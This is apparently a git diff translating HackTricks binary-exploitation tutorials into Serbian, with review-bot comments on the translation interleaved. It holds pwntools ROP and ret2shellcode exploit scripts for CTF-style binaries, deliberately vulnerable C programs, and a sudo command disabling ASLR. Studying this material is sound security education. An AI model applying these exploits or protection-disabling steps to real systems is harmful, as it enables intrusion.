[**ROP**](../rop-return-oriented-programing/) chain +- Validnu [**ONE_GADGET**](https://github.com/david942j/one_gadget) adresu. +- Adresu **`system()`** praćenu **4 junk bajta** i adresu `"/bin/sh"` (x86 bitovi). +- Adresu **`jump esp;`** gadgeta ([**ret2esp**](../rop-return-oriented-programing/ret2esp-ret2reg.md)) praćenu **shellcode-om** koji treba izvršiti. +- Neki [**ROP**](../rop-return-oriented-programing/) lanac. 
-Remember than before any of these addresses in the controlled part of the memory, there must be **`4` bytes** because of the **`pop`** part of the `leave` instruction. It would be possible to abuse these 4B to set a **second fake EBP** and continue controlling the execution. +Zapamtite da pre bilo koje od ovih adresa u kontrolisanom delu memorije, mora biti **`4` bajta** zbog **`pop`** dela `leave` instrukcije. Bilo bi moguće zloupotrebiti ovih 4B da postavite **drugi lažni EBP** i nastavite sa kontrolisanjem izvršavanja. -#### Off-By-One Exploit +#### Off-By-One Eksploit -There's a specific variant of this technique known as an "Off-By-One Exploit". It's used when you can **only modify the least significant byte of the EBP**. In such a case, the memory location storing the address to jumo to with the **`ret`** must share the first three bytes with the EBP, allowing for a similar manipulation with more constrained conditions.\ -Usually it's modified the byte 0x00t o jump as far as possible. +Postoji specifična varijanta ove tehnike poznata kao "Off-By-One Eksploit". Koristi se kada možete **samo modifikovati najmanje značajan bajt EBP-a**. U takvom slučaju, memorijska lokacija koja čuva adresu na koju treba skočiti sa **`ret`** mora deliti prva tri bajta sa EBP-om, omogućavajući sličnu manipulaciju sa strožim uslovima.\ +Obično se modifikuje bajt 0x00 da skoči što je dalje moguće. -Also, it's common to use a RET sled in the stack and put the real ROP chain at the end to make it more probably that the new ESP points inside the RET SLED and the final ROP chain is executed. +Takođe, uobičajeno je koristiti RET sled u steku i staviti pravi ROP lanac na kraj kako bi se povećala verovatnoća da novi ESP pokazuje unutar RET SLED-a i da se konačni ROP lanac izvrši. 
-### **EBP Chaining** +### **EBP Lanci** -Therefore, putting a controlled address in the `EBP` entry of the stack and an address to `leave; ret` in `EIP`, it's possible to **move the `ESP` to the controlled `EBP` address from the stack**. +Dakle, postavljanjem kontrolisane adrese u `EBP` unos steka i adrese za `leave; ret` u `EIP`, moguće je **premestiti `ESP` na kontrolisanu `EBP` adresu iz steka**. -Now, the **`ESP`** is controlled pointing to a desired address and the next instruction to execute is a `RET`. To abuse this, it's possible to place in the controlled ESP place this: +Sada je **`ESP`** kontrolisan i pokazuje na željenu adresu, a sledeća instrukcija za izvršavanje je `RET`. Da biste to zloupotrebili, moguće je staviti na kontrolisano mesto ESP ovo: -- **`&(next fake EBP)`** -> Load the new EBP because of `pop ebp` from the `leave` instruction -- **`system()`** -> Called by `ret` -- **`&(leave;ret)`** -> Called after system ends, it will move ESP to the fake EBP and start agin -- **`&("/bin/sh")`**-> Param fro `system` +- **`&(next fake EBP)`** -> Učitaj novi EBP zbog `pop ebp` iz `leave` instrukcije +- **`system()`** -> Pozvan od strane `ret` +- **`&(leave;ret)`** -> Pozvan nakon što sistem završi, premestiće ESP na lažni EBP i ponovo početi +- **`&("/bin/sh")`**-> Parametar za `system` -Basically this way it's possible to chain several fake EBPs to control the flow of the program. +U suštini, na ovaj način je moguće povezati nekoliko lažnih EBP-a kako bi se kontrolisao tok programa. -This is like a [ret2lib](../rop-return-oriented-programing/ret2lib/), but more complex with no apparent benefit but could be interesting in some edge-cases. - -Moreover, here you have an [**example of a challenge**](https://ir0nstone.gitbook.io/notes/types/stack/stack-pivoting/exploitation/leave) that uses this technique with a **stack leak** to call a winning function. 
This is the final payload from the page: +Ovo je kao [ret2lib](../rop-return-oriented-programing/ret2lib/), ali složenije bez očigledne koristi, ali bi moglo biti zanimljivo u nekim ivicama. +Štaviše, ovde imate [**primer izazova**](https://ir0nstone.gitbook.io/notes/types/stack/stack-pivoting/exploitation/leave) koji koristi ovu tehniku sa **stack leak** da pozove pobedničku funkciju. Ovo je konačni payload sa stranice: ```python from pwn import * 
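Review bot: the context block expanding `leave` (`mov ebp, esp` / `pop ebp` / `ret`) has the operands reversed and includes an instruction that is not part of `leave`: in Intel syntax `leave` is `mov esp, ebp; pop ebp`, and `ret` is the separate instruction that follows it, as the AT&T comment later in this file (`leave == mov %ebp, %esp; pop %ebp`) correctly shows; worth fixing while the surrounding paragraph is being retranslated. In the `+` lines: "I kao što je **EBP u steku** pre EIP-a" renders "And as the EBP is in the stack" as "and like", where "since" is meant ("I pošto je EBP na steku pre EIP-a"); "Kada `fvuln` vrati" needs the reflexive ("kada se `fvuln` vrati"); and "u nekim ivicama" translates "edge-cases" literally ("ivica" is a physical edge), so use "u nekim graničnim slučajevima".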
@@ -75,34 +72,32 @@ POP_RDI = 0x40122b POP_RSI_R15 = 0x401229 payload = flat( - 0x0, # rbp (could be the address of anoter fake RBP) - POP_RDI, - 0xdeadbeef, - POP_RSI_R15, - 0xdeadc0de, - 0x0, - elf.sym['winner'] +0x0, # rbp (could be the address of anoter fake RBP) +POP_RDI, +0xdeadbeef, +POP_RSI_R15, +0xdeadc0de, +0x0, +elf.sym['winner'] ) payload = payload.ljust(96, b'A') # pad to 96 (just get to RBP) payload += flat( - buffer, # Load leak address in RBP - LEAVE_RET # Use leave ro move RSP to the user ROP chain and ret to execute it +buffer, # Load leak address in RBP +LEAVE_RET # Use leave ro move RSP to the user ROP chain and ret to execute it ) pause() p.sendline(payload) print(p.recvline()) ``` +## EBP možda neće biti korišćen -## EBP might not be used - -As [**explained in this post**](https://github.com/florianhofhammer/stack-buffer-overflow-internship/blob/master/NOTES.md#off-by-one-1), if a binary is compiled with some optimizations, the **EBP never gets to control ESP**, therefore, any exploit working by controlling EBP sill basically fail because it doesn't have ay real effect.\ -This is because the **prologue and epilogue changes** if the binary is optimized. - -- **Not optimized:** +Kao [**objašnjeno u ovom postu**](https://github.com/florianhofhammer/stack-buffer-overflow-internship/blob/master/NOTES.md#off-by-one-1), ako je binarni fajl kompajliran sa nekim optimizacijama, **EBP nikada ne kontroliše ESP**, stoga, bilo koja eksploatacija koja funkcioniše kontrolom EBP će u suštini propasti jer nema stvarni efekat.\ +To je zato što se **prolog i epilog menjaju** ako je binarni fajl optimizovan. +- **Nije optimizovan:** ```bash push %ebp # save ebp mov %esp,%ebp # set new ebp @@ -113,9 +108,7 @@ sub $0x100,%esp # increase stack size leave # restore ebp (leave == mov %ebp, %esp; pop %ebp) ret # return ``` - -- **Optimized:** - +- **Optimizovano:** ```bash push %ebx # save ebx sub $0x100,%esp # increase stack size 
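Review bot: the `payload = flat(` argument lines in the `@@ -75,34` hunk are rewritten only to drop their indentation (`+0x0, # rbp (could be the address of anoter fake RBP)`, `+LEAVE_RET # Use leave ro move RSP to the user ROP chain and ret to execute it`); that is still valid Python inside the parentheses, but it is churn that makes the diff noisy for no benefit. If these lines are touched anyway, fix the comment typos "anoter" and "ro" ("another", "to") and keep the original indentation.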
@@ -126,13 +119,11 @@ add $0x10c,%esp # reduce stack size pop %ebx # restore ebx ret # return ``` - -## Other ways to control RSP +## Druge metode za kontrolu RSP ### **`pop rsp`** gadget -[**In this page**](https://ir0nstone.gitbook.io/notes/types/stack/stack-pivoting/exploitation/pop-rsp) you can find an example using this technique. For this challenge it was needed to call a function with 2 specific arguments, and there was a **`pop rsp` gadget** and there is a **leak from the stack**: - +[**Na ovoj stranici**](https://ir0nstone.gitbook.io/notes/types/stack/stack-pivoting/exploitation/pop-rsp) možete pronaći primer korišćenja ove tehnike. Za ovaj izazov bilo je potrebno pozvati funkciju sa 2 specifična argumenta, a postojala je **`pop rsp` gadget** i postoji **leak sa steka**: ```python # Code from https://ir0nstone.gitbook.io/notes/types/stack/stack-pivoting/exploitation/pop-rsp # This version has added comments @@ -152,15 +143,15 @@ POP_RSI_R15 = 0x401229 # pop RSI and R15 # The payload starts payload = flat( - 0, # r13 - 0, # r14 - 0, # r15 - POP_RDI, - 0xdeadbeef, - POP_RSI_R15, - 0xdeadc0de, - 0x0, # r15 - elf.sym['winner'] +0, # r13 +0, # r14 +0, # r15 +POP_RDI, +0xdeadbeef, +POP_RSI_R15, +0xdeadc0de, +0x0, # r15 +elf.sym['winner'] ) payload = payload.ljust(104, b'A') # pad to 104 
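Review bot: "postojala je **`pop rsp` gadget**" has a gender mismatch; "gadget" is masculine in Serbian, so "postojao je `pop rsp` gadget". The `flat(` block in the `@@ -152,15` hunk is again changed only to strip indentation (`+0, # r13`, `+0, # r14`, ...); leave whitespace inside fenced code as in the source.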
@@ -168,66 +159,63 @@ payload = payload.ljust(104, b'A') # pad to 104 # Start popping RSP, this moves the stack to the leaked address and # continues the ROP chain in the prepared payload payload += flat( - POP_CHAIN, - buffer # rsp +POP_CHAIN, +buffer # rsp ) pause() p.sendline(payload) print(p.recvline()) ``` - ### xchg \, rsp gadget - ``` pop <=== return pointer xchg , rsp ``` - ### jmp esp -Check the ret2esp technique here: +Proverite ret2esp tehniku ovde: {{#ref}} ../rop-return-oriented-programing/ret2esp-ret2reg.md {{#endref}} -## References & Other Examples +## Reference i Ostali Primeri - [https://bananamafia.dev/post/binary-rop-stackpivot/](https://bananamafia.dev/post/binary-rop-stackpivot/) - [https://ir0nstone.gitbook.io/notes/types/stack/stack-pivoting](https://ir0nstone.gitbook.io/notes/types/stack/stack-pivoting) - [https://guyinatuxedo.github.io/17-stack_pivot/dcquals19_speedrun4/index.html](https://guyinatuxedo.github.io/17-stack_pivot/dcquals19_speedrun4/index.html) - - 64 bits, off by one exploitation with a rop chain starting with a ret sled +- 64 bita, off by one eksploatacija sa rop lancem koji počinje sa ret sled - [https://guyinatuxedo.github.io/17-stack_pivot/insomnihack18_onewrite/index.html](https://guyinatuxedo.github.io/17-stack_pivot/insomnihack18_onewrite/index.html) - - 64 bit, no relro, canary, nx and pie. The program grants a leak for stack or pie and a WWW of a qword. First get the stack leak and use the WWW to go back and get the pie leak. Then use the WWW to create an eternal loop abusing `.fini_array` entries + calling `__libc_csu_fini` ([more info here](../arbitrary-write-2-exec/www2exec-.dtors-and-.fini_array.md)). Abusing this "eternal" write, it's written a ROP chain in the .bss and end up calling it pivoting with RBP. +- 64 bita, bez relro, kanarinca, nx i pie. Program omogućava leak za stack ili pie i WWW za qword. Prvo dobijte stack leak i koristite WWW da se vratite i dobijete pie leak. 
Zatim koristite WWW da kreirate večnu petlju zloupotrebljavajući `.fini_array` unose + pozivajući `__libc_csu_fini` ([više informacija ovde](../arbitrary-write-2-exec/www2exec-.dtors-and-.fini_array.md)). Zloupotrebljavajući ovo "večito" pisanje, napisano je ROP lanac u .bss i završava pozivajući ga pivotovanjem sa RBP. ## ARM64 -In ARM64, the **prologue and epilogues** of the functions **don't store and retrieve the SP registry** in the stack. Moreover, the **`RET`** instruction don't return to the address pointed by SP, but **to the address inside `x30`**. +U ARM64, **prolog i epilog** funkcija **ne čuvaju i ne preuzimaju SP registar** u stacku. Štaviše, **`RET`** instrukcija ne vraća se na adresu koju pokazuje SP, već **na adresu unutar `x30`**. -Therefore, by default, just abusing the epilogue you **won't be able to control the SP registry** by overwriting some data inside the stack. And even if you manage to control the SP you would still need a way to **control the `x30`** register. +Stoga, po defaultu, samo zloupotrebljavajući epilog **nećete moći da kontrolišete SP registar** prepisivanjem nekih podataka unutar stacka. I čak i ako uspete da kontrolišete SP, i dalje bi vam bila potrebna mogućnost da **kontrolišete `x30`** registar. 
-- prologue +- prolog - ```armasm - sub sp, sp, 16 - stp x29, x30, [sp] // [sp] = x29; [sp + 8] = x30 - mov x29, sp // FP points to frame record - ``` +```armasm +sub sp, sp, 16 +stp x29, x30, [sp] // [sp] = x29; [sp + 8] = x30 +mov x29, sp // FP pokazuje na okvir zapisa +``` -- epilogue +- epilog - ```armasm - ldp x29, x30, [sp] // x29 = [sp]; x30 = [sp + 8] - add sp, sp, 16 - ret - ``` +```armasm +ldp x29, x30, [sp] // x29 = [sp]; x30 = [sp + 8] +add sp, sp, 16 +ret +``` > [!CAUTION] -> The way to perform something similar to stack pivoting in ARM64 would be to be able to **control the `SP`** (by controlling some register whose value is passed to `SP` or because for some reason `SP` is taking his address from the stack and we have an overflow) and then **abuse the epilogu**e to load the **`x30`** register from a **controlled `SP`** and **`RET`** to it. +> Način da se izvede nešto slično pivotovanju stacka u ARM64 bio bi da se može **kontrolisati `SP`** (kontrolisanjem nekog registra čija se vrednost prosleđuje `SP` ili zato što iz nekog razloga `SP` uzima svoju adresu iz stacka i imamo overflow) i zatim **zloupotrebljavati epilog** da učitamo **`x30`** registar iz **kontrolisanog `SP`** i **`RET`** na njega. -Also in the following page you can see the equivalent of **Ret2esp in ARM64**: +Takođe na sledećoj stranici možete videti ekvivalent **Ret2esp u ARM64**: {{#ref}} ../rop-return-oriented-programing/ret2esp-ret2reg.md diff --git a/src/binary-exploitation/stack-overflow/stack-shellcode/README.md b/src/binary-exploitation/stack-overflow/stack-shellcode/README.md index 187c832b7..9caa4cc68 100644 --- a/src/binary-exploitation/stack-overflow/stack-shellcode/README.md +++ b/src/binary-exploitation/stack-overflow/stack-shellcode/README.md 
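Review bot: un-indenting the armasm fences breaks their nesting under the `- prolog` / `- epilog` bullets: in the source they were indented so they rendered as part of the list item; at column zero (`+```armasm`) the fence terminates the list and `- epilog` then starts a second list, so keep the indentation on those `+` lines. Also check "bez relro, kanarinca, nx i pie" for insomnihack18_onewrite: the English "no relro, canary, nx and pie" is ambiguous, but the Serbian reads unambiguously as "without all four", which contradicts the rest of the bullet (it goes on to obtain a "pie leak", which only makes sense if PIE is enabled); verify against the linked writeup and phrase it as "bez relro, sa kanarincem, nx i pie" if so. Minor: "stack" is rendered as "stek" earlier in the file and as "stack" / "stacku" here, so use one term, and "FP pokazuje na okvir zapisa" inverts "frame record" ("zapis okvira").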
@@ -2,49 +2,44 @@ {{#include ../../../banners/hacktricks-training.md}} -## Basic Information +## Osnovne Informacije -**Stack shellcode** is a technique used in **binary exploitation** where an attacker writes shellcode to a vulnerable program's stack and then modifies the **Instruction Pointer (IP)** or **Extended Instruction Pointer (EIP)** to point to the location of this shellcode, causing it to execute. This is a classic method used to gain unauthorized access or execute arbitrary commands on a target system. Here's a breakdown of the process, including a simple C example and how you might write a corresponding exploit using Python with **pwntools**. +**Stack shellcode** je tehnika koja se koristi u **binary exploitation** gde napadač piše shellcode na stek ranjivog programa, a zatim menja **Instruction Pointer (IP)** ili **Extended Instruction Pointer (EIP)** da pokazuje na lokaciju ovog shellcode-a, uzrokujući njegovo izvršavanje. Ovo je klasična metoda koja se koristi za sticanje neovlašćenog pristupa ili izvršavanje proizvoljnih komandi na ciljanom sistemu. Evo pregleda procesa, uključujući jednostavan C primer i kako biste mogli napisati odgovarajući exploit koristeći Python sa **pwntools**. -### C Example: A Vulnerable Program - -Let's start with a simple example of a vulnerable C program: +### C Primer: Ranjivi Program +Hajde da počnemo sa jednostavnim primerom ranjivog C programa: ```c #include #include void vulnerable_function() { - char buffer[64]; - gets(buffer); // Unsafe function that does not check for buffer overflow +char buffer[64]; +gets(buffer); // Unsafe function that does not check for buffer overflow } int main() { - vulnerable_function(); - printf("Returned safely\n"); - return 0; +vulnerable_function(); +printf("Returned safely\n"); +return 0; } ``` +Ovaj program je podložan prelivanju bafera zbog korišćenja `gets()` funkcije. -This program is vulnerable to a buffer overflow due to the use of the `gets()` function. 
- -### Compilation - -To compile this program while disabling various protections (to simulate a vulnerable environment), you can use the following command: +### Kompilacija +Da biste kompajlirali ovaj program dok onemogućavate razne zaštite (da simulirate ranjivo okruženje), možete koristiti sledeću komandu: ```sh gcc -m32 -fno-stack-protector -z execstack -no-pie -o vulnerable vulnerable.c ``` - -- `-fno-stack-protector`: Disables stack protection. -- `-z execstack`: Makes the stack executable, which is necessary for executing shellcode stored on the stack. -- `-no-pie`: Disables Position Independent Executable, making it easier to predict the memory address where our shellcode will be located. -- `-m32`: Compiles the program as a 32-bit executable, often used for simplicity in exploit development. +- `-fno-stack-protector`: Onemogućava zaštitu steka. +- `-z execstack`: Čini stek izvršnim, što je neophodno za izvršavanje shellcode-a smeštenog na steku. +- `-no-pie`: Onemogućava Position Independent Executable, olakšavajući predviđanje memorijske adrese na kojoj će se nalaziti naš shellcode. +- `-m32`: Kompajlira program kao 32-bitni izvršni fajl, često korišćen za jednostavnost u razvoju eksploata. ### Python Exploit using Pwntools -Here's how you could write an exploit in Python using **pwntools** to perform a **ret2shellcode** attack: - +Evo kako možete napisati exploit u Python-u koristeći **pwntools** za izvođenje **ret2shellcode** napada: ```python from pwn import * 
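Review bot: the heading `### Python Exploit using Pwntools` is left in English while every other heading in the hunk is translated ("### C Primer: Ranjivi Program", "### Kompilacija"); translate it for consistency ("### Python exploit sa Pwntools"). Indentation inside the C listing is stripped again (`+char buffer[64];`, `+gets(buffer); // Unsafe function ...`), which should be left as in the source.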
@@ -71,27 +66,26 @@ payload += p32(0xffffcfb4) # Supossing 0xffffcfb4 will be inside NOP slide p.sendline(payload) p.interactive() ``` +Ovaj skript konstruira payload koji se sastoji od **NOP slide**, **shellcode**, a zatim prepisuje **EIP** sa adresom koja pokazuje na NOP slide, osiguravajući da se shellcode izvrši. -This script constructs a payload consisting of a **NOP slide**, the **shellcode**, and then overwrites the **EIP** with the address pointing to the NOP slide, ensuring the shellcode gets executed. +**NOP slide** (`asm('nop')`) se koristi za povećanje šanse da će izvršenje "kliznuti" u naš shellcode bez obzira na tačnu adresu. Prilagodite `p32()` argument na početnu adresu vašeg bafera plus pomeraj da biste sleteli u NOP slide. -The **NOP slide** (`asm('nop')`) is used to increase the chance that execution will "slide" into our shellcode regardless of the exact address. Adjust the `p32()` argument to the starting address of your buffer plus an offset to land in the NOP slide. +## Zaštite -## Protections +- [**ASLR**](../../common-binary-protections-and-bypasses/aslr/) **treba da bude onemogućen** da bi adresa bila pouzdana tokom izvršenja ili adresa na kojoj će funkcija biti smeštena neće uvek biti ista i biće vam potrebna neka leak da biste saznali gde je win funkcija učitana. +- [**Stack Canaries**](../../common-binary-protections-and-bypasses/stack-canaries/) takođe treba da budu onemogućene ili prepisana EIP adresa za povratak nikada neće biti praćena. +- [**NX**](../../common-binary-protections-and-bypasses/no-exec-nx.md) **stack** zaštita bi sprečila izvršenje shellcode unutar steka jer ta oblast neće biti izvršna. -- [**ASLR**](../../common-binary-protections-and-bypasses/aslr/) **should be disabled** for the address to be reliable across executions or the address where the function will be stored won't be always the same and you would need some leak in order to figure out where is the win function loaded. 
-- [**Stack Canaries**](../../common-binary-protections-and-bypasses/stack-canaries/) should be also disabled or the compromised EIP return address won't never be followed. -- [**NX**](../../common-binary-protections-and-bypasses/no-exec-nx.md) **stack** protection would prevent the execution of the shellcode inside the stack because that region won't be executable. - -## Other Examples & References +## Ostali Primeri & Reference - [https://ir0nstone.gitbook.io/notes/types/stack/shellcode](https://ir0nstone.gitbook.io/notes/types/stack/shellcode) - [https://guyinatuxedo.github.io/06-bof_shellcode/csaw17_pilot/index.html](https://guyinatuxedo.github.io/06-bof_shellcode/csaw17_pilot/index.html) - - 64bit, ASLR with stack address leak, write shellcode and jump to it +- 64bit, ASLR sa leak-om adrese steka, napiši shellcode i skoči na njega - [https://guyinatuxedo.github.io/06-bof_shellcode/tamu19_pwn3/index.html](https://guyinatuxedo.github.io/06-bof_shellcode/tamu19_pwn3/index.html) - - 32 bit, ASLR with stack leak, write shellcode and jump to it +- 32 bit, ASLR sa leak-om steka, napiši shellcode i skoči na njega - [https://guyinatuxedo.github.io/06-bof_shellcode/tu18_shellaeasy/index.html](https://guyinatuxedo.github.io/06-bof_shellcode/tu18_shellaeasy/index.html) - - 32 bit, ASLR with stack leak, comparison to prevent call to exit(), overwrite variable with a value and write shellcode and jump to it +- 32 bit, ASLR sa leak-om steka, poređenje da se spreči poziv na exit(), prepiši promenljivu sa vrednošću i napiši shellcode i skoči na njega - [https://8ksec.io/arm64-reversing-and-exploitation-part-4-using-mprotect-to-bypass-nx-protection-8ksec-blogs/](https://8ksec.io/arm64-reversing-and-exploitation-part-4-using-mprotect-to-bypass-nx-protection-8ksec-blogs/) - - arm64, no ASLR, ROP gadget to make stack executable and jump to shellcode in stack +- arm64, bez ASLR, ROP gadget za izvršavanje steka i skakanje na shellcode u steku {{#include 
../../../banners/hacktricks-training.md}} diff --git a/src/binary-exploitation/stack-overflow/stack-shellcode/stack-shellcode-arm64.md b/src/binary-exploitation/stack-overflow/stack-shellcode/stack-shellcode-arm64.md index 3ad3e61ac..02587173b 100644 --- a/src/binary-exploitation/stack-overflow/stack-shellcode/stack-shellcode-arm64.md +++ b/src/binary-exploitation/stack-overflow/stack-shellcode/stack-shellcode-arm64.md @@ -2,47 +2,40 @@ {{#include ../../../banners/hacktricks-training.md}} -Find an introduction to arm64 in: +Pronađite uvod u arm64 u: {{#ref}} ../../../macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md {{#endref}} ## Code - ```c #include #include void vulnerable_function() { - char buffer[64]; - read(STDIN_FILENO, buffer, 256); // <-- bof vulnerability +char buffer[64]; +read(STDIN_FILENO, buffer, 256); // <-- bof vulnerability } int main() { - vulnerable_function(); - return 0; +vulnerable_function(); +return 0; } ``` - -Compile without pie, canary and nx: - +Kompajlirati bez pie, kanarinca i nx: ```bash clang -o bof bof.c -fno-stack-protector -Wno-format-security -no-pie -z execstack ``` +## Nema ASLR i nema kanarinca - Stack Overflow -## No ASLR & No canary - Stack Overflow - -To stop ASLR execute: - +Da biste zaustavili ASLR, izvršite: ```bash echo 0 | sudo tee /proc/sys/kernel/randomize_va_space ``` +Da biste dobili [**offset od bof proverite ovaj link**](../ret2win/ret2win-arm64.md#finding-the-offset). -To get the [**offset of the bof check this link**](../ret2win/ret2win-arm64.md#finding-the-offset). - -Exploit: - +Eksploatacija: ```python from pwn import * 
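Review bot: in the `@@ -71,27` hunk of stack-shellcode/README.md, the ASLR bullet under `## Zaštite` keeps a sentence copied from the ret2win page ("... da biste saznali gde je win funkcija učitana"), but this page has no `win` function; what ASLR randomises here is the stack address the exploit hardcodes (`p32(0xffffcfb4)`), so the bullet should say that the stack/shellcode address would have to be leaked instead. Also "ROP gadget za izvršavanje steka" mistranslates "ROP gadget to make stack executable" (it now reads as a gadget that executes the stack); "ROP gadget koji stek čini izvršnim" preserves the meaning. The sub-bullets under the reference links lose their indentation as in the other files.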
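Review bot: in the `@@ -2,47` hunk of stack-shellcode-arm64.md, the link `../ret2win/ret2win-arm64.md#finding-the-offset` keeps its English fragment, but this same patch renames that heading to `## Pronalaženje ofseta` in ret2win-arm64.md; mdBook derives the fragment from the heading text, so the anchor will stop resolving. Either update the fragment to the new slug, pin it with an explicit heading id if the build supports that, or keep the original heading text. Minor: "Kompajlirati bez pie, kanarinca i nx" uses the infinitive where the imperative is used elsewhere.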
@@ -73,9 +66,8 @@ p.send(payload) # Drop to an interactive session p.interactive() ``` +Jedina "komplikovana" stvar koju treba pronaći ovde bi bila adresa u steku koju treba pozvati. U mom slučaju, generisao sam exploit sa adresom pronađenom pomoću gdb, ali kada sam ga iskoristio, nije radilo (jer se adresa steka malo promenila). -The only "complicated" thing to find here would be the address in the stack to call. In my case I generated the exploit with the address found using gdb, but then when exploiting it it didn't work (because the stack address changed a bit). - -I opened the generated **`core` file** (`gdb ./bog ./core`) and checked the real address of the start of the shellcode. +Otvorio sam generisani **`core` fajl** (`gdb ./bog ./core`) i proverio pravu adresu početka shellcode-a. {{#include ../../../banners/hacktricks-training.md}} diff --git a/src/binary-exploitation/stack-overflow/uninitialized-variables.md b/src/binary-exploitation/stack-overflow/uninitialized-variables.md index 6cde48bee..412cdeff5 100644 --- a/src/binary-exploitation/stack-overflow/uninitialized-variables.md +++ b/src/binary-exploitation/stack-overflow/uninitialized-variables.md 
@@ -1,68 +1,66 @@ -# Uninitialized Variables +# Neinicijalizovane Promenljive {{#include ../../banners/hacktricks-training.md}} -## Basic Information +## Osnovne Informacije -The core idea here is to understand what happens with **uninitialized variables as they will have the value that was already in the assigned memory to them.** Example: +Osnovna ideja ovde je da se razume šta se dešava sa **neinicijalizovanim promenljivama jer će imati vrednost koja je već bila u dodeljenoj memoriji za njih.** Primer: -- **Function 1: `initializeVariable`**: We declare a variable `x` and assign it a value, let's say `0x1234`. This action is akin to reserving a spot in memory and putting a specific value in it. -- **Function 2: `useUninitializedVariable`**: Here, we declare another variable `y` but do not assign any value to it. In C, uninitialized variables don't automatically get set to zero. Instead, they retain whatever value was last stored at their memory location. +- **Funkcija 1: `initializeVariable`**: Deklarisemo promenljivu `x` i dodeljujemo joj vrednost, recimo `0x1234`. Ova akcija je slična rezervisanju mesta u memoriji i stavljanju specifične vrednosti u nju. +- **Funkcija 2: `useUninitializedVariable`**: Ovde, deklarisemo još jednu promenljivu `y`, ali joj ne dodeljujemo nikakvu vrednost. U C-u, neinicijalizovane promenljive se automatski ne postavljaju na nulu. Umesto toga, zadržavaju bilo koju vrednost koja je poslednja sačuvana na njihovoj memorijskoj lokaciji. -When we run these two functions **sequentially**: +Kada pokrenemo ove dve funkcije **uzastopno**: -1. In `initializeVariable`, `x` is assigned a value (`0x1234`), which occupies a specific memory address. -2. In `useUninitializedVariable`, `y` is declared but not assigned a value, so it takes the memory spot right after `x`. Due to not initializing `y`, it ends up "inheriting" the value from the same memory location used by `x`, because that's the last value that was there. +1. 
U `initializeVariable`, `x` dobija vrednost (`0x1234`), koja zauzima specifičnu adresu u memoriji. +2. U `useUninitializedVariable`, `y` je deklarisana, ali joj nije dodeljena vrednost, pa zauzima memorijsko mesto odmah nakon `x`. Zbog neinicijalizovanja `y`, ona na kraju "nasleđuje" vrednost iz iste memorijske lokacije koju koristi `x`, jer je to poslednja vrednost koja je bila tamo. -This behavior illustrates a key concept in low-level programming: **Memory management is crucial**, and uninitialized variables can lead to unpredictable behavior or security vulnerabilities, as they may unintentionally hold sensitive data left in memory. +Ovo ponašanje ilustruje ključni koncept u niskonivou programiranju: **Upravljanje memorijom je ključno**, a neinicijalizovane promenljive mogu dovesti do nepredvidivog ponašanja ili sigurnosnih ranjivosti, jer mogu nenamerno sadržati osetljive podatke ostavljene u memoriji. -Uninitialized stack variables could pose several security risks like: +Neinicijalizovane promenljive na steku mogu predstavljati nekoliko sigurnosnih rizika kao što su: -- **Data Leakage**: Sensitive information such as passwords, encryption keys, or personal details can be exposed if stored in uninitialized variables, allowing attackers to potentially read this data. -- **Information Disclosure**: The contents of uninitialized variables might reveal details about the program's memory layout or internal operations, aiding attackers in developing targeted exploits. -- **Crashes and Instability**: Operations involving uninitialized variables can result in undefined behavior, leading to program crashes or unpredictable outcomes. -- **Arbitrary Code Execution**: In certain scenarios, attackers could exploit these vulnerabilities to alter the program's execution flow, enabling them to execute arbitrary code, which might include remote code execution threats. 
- -### Example +- **Curjenje Podataka**: Osetljive informacije kao što su lozinke, ključevi za enkripciju ili lični podaci mogu biti izloženi ako su sačuvani u neinicijalizovanim promenljivama, omogućavajući napadačima da potencijalno pročitaju ove podatke. +- **Otkrivanje Informacija**: Sadržaj neinicijalizovanih promenljivih može otkriti detalje o rasporedu memorije programa ili unutrašnjim operacijama, pomažući napadačima u razvoju ciljanih eksploatacija. +- **Rušenja i Nestabilnost**: Operacije koje uključuju neinicijalizovane promenljive mogu rezultirati neodređenim ponašanjem, što dovodi do rušenja programa ili nepredvidivih ishoda. +- **Izvršavanje Arbitrarnog Koda**: U određenim scenarijima, napadači bi mogli iskoristiti ove ranjivosti da promene tok izvršavanja programa, omogućavajući im da izvrše arbitrarnu kod, što može uključivati pretnje od daljinskog izvršavanja koda. +### Primer ```c #include // Function to initialize and print a variable void initializeAndPrint() { - int initializedVar = 100; // Initialize the variable - printf("Initialized Variable:\n"); - printf("Address: %p, Value: %d\n\n", (void*)&initializedVar, initializedVar); +int initializedVar = 100; // Initialize the variable +printf("Initialized Variable:\n"); +printf("Address: %p, Value: %d\n\n", (void*)&initializedVar, initializedVar); } // Function to demonstrate the behavior of an uninitialized variable void demonstrateUninitializedVar() { - int uninitializedVar; // Declare but do not initialize - printf("Uninitialized Variable:\n"); - printf("Address: %p, Value: %d\n\n", (void*)&uninitializedVar, uninitializedVar); +int uninitializedVar; // Declare but do not initialize +printf("Uninitialized Variable:\n"); +printf("Address: %p, Value: %d\n\n", (void*)&uninitializedVar, uninitializedVar); } int main() { - printf("Demonstrating Initialized vs. Uninitialized Variables in C\n\n"); +printf("Demonstrating Initialized vs. 
Uninitialized Variables in C\n\n"); - // First, call the function that initializes its variable - initializeAndPrint(); +// First, call the function that initializes its variable +initializeAndPrint(); - // Then, call the function that has an uninitialized variable - demonstrateUninitializedVar(); +// Then, call the function that has an uninitialized variable +demonstrateUninitializedVar(); - return 0; +return 0; } ``` +#### Kako ovo funkcioniše: -#### How This Works: +- **`initializeAndPrint` Funkcija**: Ova funkcija deklariše celobrojnu promenljivu `initializedVar`, dodeljuje joj vrednost `100`, a zatim ispisuje i adresu u memoriji i vrednost promenljive. Ovaj korak je jednostavan i pokazuje kako se ponaša inicijalizovana promenljiva. +- **`demonstrateUninitializedVar` Funkcija**: U ovoj funkciji, deklarišemo celobrojnu promenljivu `uninitializedVar` bez inicijalizacije. Kada pokušamo da ispišemo njenu vrednost, izlaz može prikazati nasumičan broj. Ovaj broj predstavlja bilo koje podatke koji su prethodno bili na toj memorijskoj lokaciji. U zavisnosti od okruženja i kompajlera, stvarni izlaz može varirati, a ponekad, iz bezbednosnih razloga, neki kompajleri mogu automatski inicijalizovati promenljive na nulu, iako se na to ne treba oslanjati. +- **`main` Funkcija**: `main` funkcija poziva obe gornje funkcije u nizu, demonstrirajući razliku između inicijalizovane i neinicijalizovane promenljive. -- **`initializeAndPrint` Function**: This function declares an integer variable `initializedVar`, assigns it the value `100`, and then prints both the memory address and the value of the variable. This step is straightforward and shows how an initialized variable behaves. -- **`demonstrateUninitializedVar` 